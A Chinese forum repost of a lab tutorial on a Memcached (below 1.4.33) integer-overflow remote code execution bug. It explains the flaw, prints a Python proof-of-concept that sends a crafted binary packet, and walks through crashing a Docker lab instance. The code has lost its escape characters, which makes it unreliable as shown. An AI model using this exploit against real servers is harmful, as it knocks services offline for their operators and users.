论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
代码执行
[19132] 2017-10-27_【实验】MemcachedServer远程代码执行漏洞
文档创建者:
s7ckTeam
浏览次数:
6
最后更新:
2025-01-18
代码执行
6 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2017-10-27_【实验】MemcachedServer远程代码执行漏洞
【
实
验
】
M
e
m
c
a
c
h
e
d
S
e
r
v
e
r
远
程
代
码
执
行
漏
洞
i
春
秋
2
0
1
7
-
1
0
-
2
7
”
M
e
m
c
a
c
h
e
d
是
一
个
广
泛
使
用
的
高
速
缓
存
系
统
,
对
方
可
以
通
过
向
服
务
器
发
送
一
个
精
心
构
造
的
M
e
m
c
a
c
h
e
d
命
令
实
现
该
漏
洞
的
利
用
。
此
外
,
这
些
漏
洞
还
可
以
泄
露
敏
感
的
进
程
信
息
,
并
且
可
以
多
次
触
发
,
利
用
这
些
敏
感
的
进
程
信
息
,
对
方
可
以
绕
过
像
A
S
L
R
等
常
见
的
漏
洞
缓
解
机
制
。
漏
洞
出
现
的
原
因
是
因
为
p
r
o
c
e
s
s
_
b
i
n
_
a
p
p
e
n
d
_
p
r
e
p
e
n
d
函
数
存
在
整
数
溢
出
。
该
函
数
主
要
负
责
处
理
m
e
m
c
a
c
h
e
d
二
进
制
协
议
的
多
个
命
令
,
最
终
可
能
出
现
滥
用
导
致
堆
溢
出
并
实
现
远
程
代
码
执
行
问
题
。
今
天
小
编
带
大
家
了
解
M
e
m
c
a
c
h
e
d
S
e
r
v
e
r
远
程
代
码
执
行
漏
洞
远
程
代
码
执
行
漏
洞
原
理
基
础
知
识
,
通
过
实
验
掌
握
对
该
漏
洞
的
修
补
方
法
吧
~
实
验
环
境
实
验
环
境
操
作
机
:
W
i
n
d
o
w
s
X
P
目
标
机
:
U
b
u
n
t
u
目
标
机
I
P
:
1
7
2
.
1
6
.
1
2
.
2
实
验
目
的
实
验
目
的
了
解
漏
洞
产
生
原
理
学
习
漏
洞
攻
击
、
防
御
手
法
实
验
内
容
实
验
内
容
漏
洞
简
介
漏
洞
简
介
攻
击
者
可
以
通
过
向
服
务
器
发
送
一
个
精
心
构
造
的
M
e
m
c
a
c
h
e
d
命
令
实
现
该
漏
洞
的
利
用
。
此
外
,
漏
洞
还
可
以
泄
露
敏
感
的
进
程
信
息
,
并
且
可
以
多
次
触
发
,
利
用
这
些
敏
感
的
进
程
信
息
,
攻
击
者
可
以
绕
过
像
A
S
L
R
等
常
见
的
漏
洞
缓
解
机
制
。
漏
洞
出
现
的
原
因
是
因
为
p
r
o
c
e
s
s
_
b
i
n
_
a
p
p
e
n
d
_
p
r
e
p
e
n
d
函
数
存
在
整
数
溢
出
。
该
函
数
主
要
负
责
处
理
m
e
m
c
a
c
h
e
d
二
进
制
协
议
的
多
个
命
令
,
最
终
可
能
出
现
滥
用
导
致
堆
溢
出
并
实
现
远
程
代
码
执
行
问
题
。
影
响
版
本
影
响
版
本
小
于
1
.
4
.
3
3
实
验
步
骤
实
验
步
骤
步
骤
步
骤
1
:
了
解
原
理
:
了
解
原
理
M
e
m
c
a
c
h
e
d
是
一
个
高
性
能
的
分
布
式
内
存
对
象
缓
存
系
统
,
用
于
动
态
W
e
b
应
用
以
减
轻
数
据
库
负
载
。
它
通
过
在
内
存
中
缓
存
数
据
和
对
象
来
减
少
读
取
数
据
库
的
次
数
,
从
而
提
高
动
态
、
数
据
库
驱
动
网
站
的
速
度
。
在
服
务
中
,
当
执
行
A
p
p
e
n
d
(
o
p
c
o
d
e
0
x
0
e
)
,
P
r
e
p
e
n
d
(
o
p
c
o
d
e
0
x
0
f
)
,
A
p
p
e
n
d
Q
(
0
x
1
9
)
,
P
r
e
p
e
n
d
Q
(
o
p
c
o
d
e
0
x
1
a
)
命
令
时
会
进
入
这
样
如
下
代
码
路
径
:
c
a
s
e
P
R
O
T
O
C
O
L
_
B
I
N
A
R
Y
_
C
M
D
_
A
P
P
E
N
D
:
c
a
s
e
P
R
O
T
O
C
O
L
_
B
I
N
A
R
Y
_
C
M
D
_
P
R
E
P
E
N
D
:
i
f
(
k
e
y
l
e
n
>
0
&
&
e
x
t
l
e
n
=
=
0
)
{
b
i
n
_
r
e
a
d
_
k
e
y
(
c
,
b
i
n
_
r
e
a
d
i
n
g
_
s
e
t
_
h
e
a
d
e
r
,
0
)
;
}
e
l
s
e
{
p
r
o
t
o
c
o
l
_
e
r
r
o
r
=
1
;
}
b
r
e
a
k
;
这
里
并
仅
检
查
了
k
e
y
l
e
n
和
e
x
t
l
e
n
的
值
,
并
没
有
检
查
b
o
d
y
l
e
n
。
c
o
m
p
l
e
t
e
_
n
r
e
a
d
_
b
i
n
a
r
y
(
)
后
,
即
当
从
s
o
c
k
e
t
中
读
取
和
解
析
完
h
e
a
d
e
r
、
e
x
t
l
e
n
、
k
e
y
后
,
注
意
此
时
v
a
l
u
e
还
没
从
s
o
c
k
e
t
中
读
取
,
程
序
进
入
了
p
r
o
c
e
s
s
_
b
i
n
_
a
p
p
e
n
d
_
p
r
e
p
e
n
d
(
)
函
数
中
,
k
e
y
=
b
i
n
a
r
y
_
g
e
t
_
k
e
y
(
c
)
;
n
k
e
y
=
c
-
>
b
i
n
a
r
y
_
h
e
a
d
e
r
.
r
e
q
u
e
s
t
.
k
e
y
l
e
n
;
/
/
v
l
e
n
=
c
-
>
b
i
n
a
r
y
_
h
e
a
d
e
r
.
r
e
q
u
e
s
t
.
b
o
d
y
l
e
n
-
n
k
e
y
;
.
.
.
i
t
=
i
t
e
m
_
a
l
l
o
c
(
k
e
y
,
n
k
e
y
,
0
,
0
,
v
l
e
n
+
2
)
;
这
里
k
e
y
l
e
n
做
过
合
法
性
检
查
,
b
o
d
y
l
e
n
没
有
,
所
以
i
t
m
e
_
a
l
l
o
c
(
)
函
数
中
的
参
数
中
k
e
y
、
n
k
e
y
可
以
保
证
合
法
性
,
但
v
l
e
n
无
法
保
证
。
P
O
C
内
容
如
下
:
#
-
*
-
c
o
d
i
n
g
:
u
t
f
-
8
-
*
-
i
m
p
o
r
t
s
t
r
u
c
t
i
m
p
o
r
t
s
o
c
k
e
t
i
m
p
o
r
t
s
y
s
M
E
M
C
A
C
H
E
D
_
R
E
Q
U
E
S
T
_
M
A
G
I
C
=
"
x
8
0
"
O
P
C
O
D
E
_
P
R
E
P
E
N
D
_
Q
=
"
x
1
a
"
k
e
y
_
l
e
n
=
s
t
r
u
c
t
.
p
a
c
k
(
"
!
H
"
,
0
x
f
a
)
e
x
t
r
a
_
l
e
n
=
"
x
0
0
"
d
a
t
a
_
t
y
p
e
=
"
x
0
0
"
v
b
u
c
k
e
t
=
"
x
0
0
x
0
0
"
b
o
d
y
_
l
e
n
=
s
t
r
u
c
t
.
p
a
c
k
(
"
!
I
"
,
0
)
o
p
a
q
u
e
=
s
t
r
u
c
t
.
p
a
c
k
(
"
!
I
"
,
0
)
C
A
S
=
s
t
r
u
c
t
.
p
a
c
k
(
"
!
Q
"
,
0
)
b
o
d
y
=
"
A
"
*
1
0
2
4
i
f
l
e
n
(
s
y
s
.
a
r
g
v
)
!
=
3
:
p
r
i
n
t
"
.
/
p
o
c
_
c
r
a
s
h
.
p
y
<
s
e
r
v
e
r
>
<
p
o
r
t
>
"
s
y
s
.
e
x
i
t
(
1
)
p
a
c
k
e
t
=
M
E
M
C
A
C
H
E
D
_
R
E
Q
U
E
S
T
_
M
A
G
I
C
+
O
P
C
O
D
E
_
P
R
E
P
E
N
D
_
Q
+
k
e
y
_
l
e
n
+
e
x
t
r
a
_
l
e
n
p
a
c
k
e
t
+
=
d
a
t
a
_
t
y
p
e
+
v
b
u
c
k
e
t
+
b
o
d
y
_
l
e
n
+
o
p
a
q
u
e
+
C
A
S
p
a
c
k
e
t
+
=
b
o
d
y
s
e
t
_
p
a
c
k
e
t
=
"
s
e
t
t
e
s
t
k
e
y
0
6
0
4
r
n
t
e
s
t
r
n
"
g
e
t
_
p
a
c
k
e
t
=
"
g
e
t
t
e
s
t
k
e
y
r
n
"
s
1
=
s
o
c
k
e
t
.
s
o
c
k
e
t
(
s
o
c
k
e
t
.
A
F
_
I
N
E
T
,
s
o
c
k
e
t
.
S
O
C
K
_
S
T
R
E
A
M
)
s
1
.
c
o
n
n
e
c
t
(
(
s
y
s
.
a
r
g
v
[
1
]
,
i
n
t
(
s
y
s
.
a
r
g
v
[
2
]
)
)
)
s
1
.
s
e
n
d
a
l
l
(
s
e
t
_
p
a
c
k
e
t
)
p
r
i
n
t
s
1
.
r
e
c
v
(
1
0
2
4
)
s
1
.
c
l
o
s
e
(
)
s
2
=
s
o
c
k
e
t
.
s
o
c
k
e
t
(
s
o
c
k
e
t
.
A
F
_
I
N
E
T
,
s
o
c
k
e
t
.
S
O
C
K
_
S
T
R
E
A
M
)
s
2
.
c
o
n
n
e
c
t
(
(
s
y
s
.
a
r
g
v
[
1
]
,
i
n
t
(
s
y
s
.
a
r
g
v
[
2
]
)
)
)
s
2
.
s
e
n
d
a
l
l
(
p
a
c
k
e
t
)
p
r
i
n
t
s
2
.
r
e
c
v
(
1
0
2
4
)
s
2
.
c
l
o
s
e
(
)
s
3
=
s
o
c
k
e
t
.
s
o
c
k
e
t
(
s
o
c
k
e
t
.
A
F
_
I
N
E
T
,
s
o
c
k
e
t
.
S
O
C
K
_
S
T
R
E
A
M
)
s
3
.
c
o
n
n
e
c
t
(
(
s
y
s
.
a
r
g
v
[
1
]
,
i
n
t
(
s
y
s
.
a
r
g
v
[
2
]
)
)
)
s
3
.
s
e
n
d
a
l
l
(
g
e
t
_
p
a
c
k
e
t
)
s
3
.
r
e
c
v
(
1
0
2
4
)
s
3
.
c
l
o
s
e
(
)
步
骤
步
骤
2
:
漏
洞
利
用
:
漏
洞
利
用
我
们
首
先
使
用
X
s
h
e
l
l
连
接
目
标
机
器
,
I
P
为
1
7
2
.
1
6
.
1
2
.
2
,
账
号
密
码
为
:
i
c
h
u
n
q
i
u
i
c
h
u
n
q
i
u
(
使
用
E
v
e
r
y
t
h
i
n
g
搜
索
X
s
h
e
l
l
工
具
)
连
接
成
功
后
,
使
用
命
令
:
x
s
h
e
接
下
来
启
动
M
e
m
c
a
c
h
e
d
S
e
r
v
e
r
服
务
,
命
令
如
下
:
d
o
c
k
e
r
i
m
a
g
e
s
/
/
列
出
镜
像
d
o
c
k
e
r
r
u
n
-
d
-
p
1
1
2
1
1
:
1
1
2
1
1
a
f
1
3
3
6
6
3
2
a
5
1
/
/
启
动
容
器
其
中
:
-
d
是
指
让
其
在
后
台
运
行
,
-
p
代
表
指
定
端
口
,
后
面
的
代
表
镜
像
名
称
这
时
在
输
入
命
令
:
d
o
c
k
e
r
p
s
/
/
查
看
容
器
是
否
运
行
如
上
图
所
示
,
成
功
运
行
。
接
下
来
我
们
执
行
P
O
C
,
达
到
命
令
执
行
的
效
果
,
令
M
e
m
c
a
c
h
e
d
服
务
停
止
运
行
。
使
用
命
令
:
p
y
t
h
o
n
2
.
7
p
o
c
.
p
y
1
2
7
.
0
.
0
.
1
1
1
2
1
1
/
/
执
行
P
O
C
d
o
c
k
e
r
p
s
如
上
图
所
示
,
服
务
已
经
停
止
,
验
证
成
功
。
实
验
结
果
分
析
与
总
结
实
验
结
果
分
析
与
总
结
本
次
实
验
我
们
学
习
了
M
e
m
c
a
c
h
e
d
S
e
r
v
e
r
漏
洞
产
生
原
理
,
并
使
用
P
O
C
成
功
命
令
执
行
。
戳
阅
读
原
文
,
感
受
实
验
环
境
吧
戳
阅
读
原
文
,
感
受
实
验
环
境
吧
~
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
代码执行